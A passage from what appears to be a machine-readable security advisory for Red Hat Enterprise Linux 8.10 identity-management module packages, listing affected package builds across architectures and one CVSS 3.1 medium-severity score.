"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
